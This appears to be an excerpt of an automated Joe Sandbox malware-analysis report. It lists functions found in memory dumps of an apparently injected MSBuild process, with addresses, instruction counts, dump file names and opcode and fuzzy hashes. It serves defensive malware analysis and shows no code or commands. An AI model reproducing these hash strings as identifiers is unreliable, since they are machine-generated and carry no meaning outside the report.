                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B72BC30B003148FDB25DBA4D864AAE7BB2BFC6711F404A59D1069F391CBB5ED09CB96
                                                                                                                                                                                                                                                Function 054E8808 Relevance: .7, Instructions: 654COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1667172186.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_54e0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0a82fa9497471ac1218e798afe934b85381d7f970d4b20d001967f992fbcfd9f
                                                                                                                                                                                                                                                • Instruction ID: 4e528399190ad758206bbf814fce404d6401a83413653b0e070a64d97cf6040e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a82fa9497471ac1218e798afe934b85381d7f970d4b20d001967f992fbcfd9f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1420374B002189FDB54CF68C994EAEBBF6BF89700F10809AE506DB3A5DA71ED45CB50
                                                                                                                                                                                                                                                Function 054E6DA1 Relevance: .6, Instructions: 611COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1667172186.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_54e0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 46a5eeea2f51117afd93069a8081dca87464679a6bbde20088aaeb1ff800922a
                                                                                                                                                                                                                                                • Instruction ID: 6b9dcabf71e65ba3636856c04ba2b4f97d08997ca1591c011b0d032320bde516
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46a5eeea2f51117afd93069a8081dca87464679a6bbde20088aaeb1ff800922a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41328034B402148FDB249B24C994EEEB7B2EB89315F10C19AEA0A5F751CB71ED85CF94
                                                                                                                                                                                                                                                Function 0709D9E8 Relevance: .6, Instructions: 596COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d96839a3b1c9ae30fc9b1dc933211dd7689d81777bf9098e109a9d4450b0506d
                                                                                                                                                                                                                                                • Instruction ID: f3f646165a0de860abdc6894d3372efb3aff2bc3ec30867d9913c05469d72068
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d96839a3b1c9ae30fc9b1dc933211dd7689d81777bf9098e109a9d4450b0506d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 373258B47006018FDB54DF39C898A6ABBF2FF89710B1585A9E506CB362DB30EC45CB91
                                                                                                                                                                                                                                                Function 072AC5B0 Relevance: .5, Instructions: 487COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4f76ec6f564f8740314a2623d7b4b5be552c3c38627834b492e7845be67e0778
                                                                                                                                                                                                                                                • Instruction ID: c701828da2037ef102cc24d6d71ccb4585c377375c8b3bf739b1e2aee3fa15fb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f76ec6f564f8740314a2623d7b4b5be552c3c38627834b492e7845be67e0778
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0302CEB1B14341AFD711CF68C580AAABBF6FF85310F19849AD54ADB652C730EC85CBA1
                                                                                                                                                                                                                                                Function 071B3428 Relevance: .5, Instructions: 480COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ce3c629293e5aba5990ac85ce1ad16defc48f83beec23cddc7005f48fac34763
                                                                                                                                                                                                                                                • Instruction ID: 29ee7afd23bc4264dc2e2b467230aa5b50102e5efe99d6ff244ce5c8490800cb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce3c629293e5aba5990ac85ce1ad16defc48f83beec23cddc7005f48fac34763
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D2258B5600706DFCB25DF64D5849AABBF2FF88310B158A68E4568B791DB34EC52CF80
                                                                                                                                                                                                                                                Function 07116300 Relevance: .4, Instructions: 399COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4abd4e2710e35d2d568f3940366a44b4e6754f7b0b13b0ad4ecf49dc3c9c7817
                                                                                                                                                                                                                                                • Instruction ID: b69a9374840af7683041b25de9582843ab57ea269886fa16c3031908f396dc46
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4abd4e2710e35d2d568f3940366a44b4e6754f7b0b13b0ad4ecf49dc3c9c7817
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31F15AB57106018FDB55CF2AC499AAEBBF2FF85220F198469E546CB7A1CB35EC00CB51
                                                                                                                                                                                                                                                Function 072A95F8 Relevance: .4, Instructions: 396COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9b5f376333e40542cd30f39894066691c2ec7c0199cdbdd1e13f45d6b6e16e70
                                                                                                                                                                                                                                                • Instruction ID: 1ddcea881e08429abc30af1dff8710cd0b59a30585e295dc7b2e89f37f51bedd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b5f376333e40542cd30f39894066691c2ec7c0199cdbdd1e13f45d6b6e16e70
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A0213B4A1061AEFCB14DF65C588AADBBF3FF48300F248569D95A9B251C731E981CF90
                                                                                                                                                                                                                                                Function 0711A178 Relevance: .4, Instructions: 356COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4ac593ac4b6719cadfd8255db56643c4b321bbbda909e99b8df4b5daa68124ee
                                                                                                                                                                                                                                                • Instruction ID: 5db63671636f39d5229b52b41056eadc317634915c57ffa882da356649bd6936
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ac593ac4b6719cadfd8255db56643c4b321bbbda909e99b8df4b5daa68124ee
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78E159B0A01706DFDB15DF64C484AAABBF2BF89310B15C5A9D4099F3A2DB31ED45CB90
                                                                                                                                                                                                                                                Function 071B58E8 Relevance: .3, Instructions: 332COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4a5d1d3004c828da700d135406e53fbc0c415edeeba74ed2c8053963d9a9f30f
                                                                                                                                                                                                                                                • Instruction ID: 0d0eed79ea792a603699c7c64441b61c1a5144b25b9aa55ca9a22aa4c2017bcf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a5d1d3004c828da700d135406e53fbc0c415edeeba74ed2c8053963d9a9f30f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FD11AB5A102059FCB15DF64D484AAEBBF2FF89320F158559E8059B7A1D730ED41CF90
                                                                                                                                                                                                                                                Function 072AB720 Relevance: .3, Instructions: 306COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 38174dcb3c91caca69d8cb784107b12eccf2c76d7410c97d8bcf831a67218485
                                                                                                                                                                                                                                                • Instruction ID: 551851e32c802e1a2c44a4791289d8d9c1e83c46ca335289bffe42abaea2938b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38174dcb3c91caca69d8cb784107b12eccf2c76d7410c97d8bcf831a67218485
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64B17EB1B2110AEFCB08DB79C8949BDB7F2FF89211B104569D406DB390DB70AE05CB91
                                                                                                                                                                                                                                                Function 0711A880 Relevance: .3, Instructions: 296COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ef091648d1e7e6d4e3389a0ea01ecc9b51909987b7692303f99c120d4a979561
                                                                                                                                                                                                                                                • Instruction ID: f0b3b56a5ec19877f306da9af8c4a86eb0537d64477922d0fa067a5512fa4a1a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef091648d1e7e6d4e3389a0ea01ecc9b51909987b7692303f99c120d4a979561
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5B189B0716302CFD725CF25C944B6ABBE6AF85210F198939E947CB780DB34E981CB65
                                                                                                                                                                                                                                                Function 054E0712 Relevance: .3, Instructions: 290COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1667172186.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_54e0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3cc1a0dae473e9301f5123c727d8f56f6ae41da7fd1413676e3b3454ad15636c
                                                                                                                                                                                                                                                • Instruction ID: fbce97629ad2bc69a986e2aad9286ff663148123dc4bf4a69cf2dbdf4a635f75
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3cc1a0dae473e9301f5123c727d8f56f6ae41da7fd1413676e3b3454ad15636c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65B1B135B003049FEB048BA4D958BBA77A7FB89305F508056EA069F3A1DEB5DC45CB51
                                                                                                                                                                                                                                                Function 0711DF00 Relevance: .3, Instructions: 290COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 76241927fe2c3b0a1d058222fd26bc556070564d6a45b51f24f9abc5dbfaae9f
                                                                                                                                                                                                                                                • Instruction ID: 6707c7e85caf0830633f4caa2ba349401c821a6f94de68fc66c9db5f0cf30c6f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76241927fe2c3b0a1d058222fd26bc556070564d6a45b51f24f9abc5dbfaae9f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BB1C0B07043418FD326CF64D558A66BBE3EF85211B1AC5AAD94ACF792CB30EC49CB51
                                                                                                                                                                                                                                                Function 071B87BE Relevance: .3, Instructions: 284COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9e3524cfb7b2d503b5c38648afa4d515116e88a48f3205052473f2fe4409f44c
                                                                                                                                                                                                                                                • Instruction ID: 35fac6e2a4fae535da5b8c7de795adfa8db2f8727632ebe1d439e18d55ae13ca
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e3524cfb7b2d503b5c38648afa4d515116e88a48f3205052473f2fe4409f44c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6DB1F4B6900251CFDB22CF78D880BD9BBF2FF8AB24F14459AD4459B285DB35A845CF81
                                                                                                                                                                                                                                                Function 0709D9DA Relevance: .3, Instructions: 281COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8c327e36a1d0e72b28230ac746cd83f3ec0d2f3d4911097dc1f350eb3f30816a
                                                                                                                                                                                                                                                • Instruction ID: 20027bb10e06aed3dc194f0aded5572919532d7f6625b5521a8b44d609e0616a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c327e36a1d0e72b28230ac746cd83f3ec0d2f3d4911097dc1f350eb3f30816a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33B136747006058FCB54DF39C898AAABBF2BF89614B1581A9E546DB372DB30EC05CF61
                                                                                                                                                                                                                                                Function 0711B270 Relevance: .3, Instructions: 280COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dd0969ed3326be780a49d176cd972db3a1b631478c03d36b7b6863407a7f99c3
                                                                                                                                                                                                                                                • Instruction ID: 19bf7584efca1e666af3b28c82c64ba047774f1ca4909feba6ea9b275dad1973
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd0969ed3326be780a49d176cd972db3a1b631478c03d36b7b6863407a7f99c3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92913DF07183029BEBB56B36996436A62ABAFC5741B1884399A03CF7C4DF35DC418F61
                                                                                                                                                                                                                                                Function 054E84B8 Relevance: .3, Instructions: 277COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1667172186.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_54e0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5982f228d16eca1d3666e8f5da2ce483c6ec3f7c307edd9f30bc7b133d0a2e76
                                                                                                                                                                                                                                                • Instruction ID: 97e8eb48e65faed580a2b7dda08140349a6a6eadb7254be9ef3074ab7141147b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5982f228d16eca1d3666e8f5da2ce483c6ec3f7c307edd9f30bc7b133d0a2e76
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DA16F35B002049FDB44CF68D994EAABBF2FF89711B1580AAE905EF361DA31EC05CB50
                                                                                                                                                                                                                                                Function 072A6960 Relevance: .3, Instructions: 271COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 861abd03ad14ce2c6e329cc63fd56cc8348699491731f10b6927f019a8b2f694
                                                                                                                                                                                                                                                • Instruction ID: c12859032c1344df15679a5054e1044869f1289f276490de5d6ab2b08f2e1342
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 861abd03ad14ce2c6e329cc63fd56cc8348699491731f10b6927f019a8b2f694
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 268172F073530BEF9B2596B594287BA77D7BB86B10B1C44A5C502DF6A0DF60CC028B66
                                                                                                                                                                                                                                                Function 072AE538 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 866e90b482d09992506bd8330ad079a97d092ad98210de40ee666c0ef8fb51ae
                                                                                                                                                                                                                                                • Instruction ID: 4731e78b12ac058ffbc14851d0fc7b0e893ef364674c577415bcc58aac15c466
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 866e90b482d09992506bd8330ad079a97d092ad98210de40ee666c0ef8fb51ae
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92B1FAB4E21209EFDB05CF98D485A9DBBB2FF48320F158159E814AB361C771ED82CB94
                                                                                                                                                                                                                                                Function 072ADB70 Relevance: .3, Instructions: 260COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 987bf0a53e1b358e1726e0dc544de22d55357649096efc706c6fc5602bc0abaa
                                                                                                                                                                                                                                                • Instruction ID: 5c28cf44c9c9a90a36e27194068760fa0047ce85cb6de032723a316815681e56
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 987bf0a53e1b358e1726e0dc544de22d55357649096efc706c6fc5602bc0abaa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6B137B4A11249EFDB14CFA8D584A9DFBF2AF88310F24C159E814AB765C770ED42CB90
                                                                                                                                                                                                                                                Function 071B03E0 Relevance: .3, Instructions: 259COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 84dcdf088560021674e67e9fcc78e8e99ee48a6b3a65cde5b274db6a683be86b
                                                                                                                                                                                                                                                • Instruction ID: 5855a09ac79c3b4e48634ea92c168589ee8c5da79297e7e1b399b8edab761f8c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84dcdf088560021674e67e9fcc78e8e99ee48a6b3a65cde5b274db6a683be86b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D81A4F0B11226EBDB360A6588447BF7AA7ABCDB50F054529ED069B2C4CF71CC418BD1
                                                                                                                                                                                                                                                Function 07119E30 Relevance: .3, Instructions: 252COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dd19defb75beb6e33123583c86241170f1da69e032b445ac75ca82ae8c4d1ac2
                                                                                                                                                                                                                                                • Instruction ID: 8c7f5d6d6bc19f74dd96b5d6923dc45ef0f71b481ee6ad73e8fc4a20436acb7c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd19defb75beb6e33123583c86241170f1da69e032b445ac75ca82ae8c4d1ac2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 269190B0700605AFDB05EB74E8986AEBBE2FFC8711F148528E5069B684DF349D058BA5
                                                                                                                                                                                                                                                Function 0709348F Relevance: .3, Instructions: 251COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 36c1da14145820b4ba4b35847fcb10a1bd8980d5125290756532a7c9bb1cdf92
                                                                                                                                                                                                                                                • Instruction ID: 8687e6e7894897702e76b7334328297a722ca37759186753969e1a84cdcd1d87
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36c1da14145820b4ba4b35847fcb10a1bd8980d5125290756532a7c9bb1cdf92
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3B16B74600305AFC745DF64C8849AABBF2FF89220B158A99D54A8F762DB30FD49CF91
                                                                                                                                                                                                                                                Function 07115E98 Relevance: .2, Instructions: 249COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e1da7d3ab794c84e298a8a1dcdbc4c800ce6683d9e1b7c3d8cd2d6feda387fe5
                                                                                                                                                                                                                                                • Instruction ID: e162d6ae4e7c872f07155a8dd6952ff2dd48bfd21c97b43f0cb894528df6443c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1da7d3ab794c84e298a8a1dcdbc4c800ce6683d9e1b7c3d8cd2d6feda387fe5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EBA15AB4B102099FDB14DFA5C954AAEB7B2BF88710B118529D906AF3A4DF71EC01CF90
                                                                                                                                                                                                                                                Function 070934C0 Relevance: .2, Instructions: 230COMMON
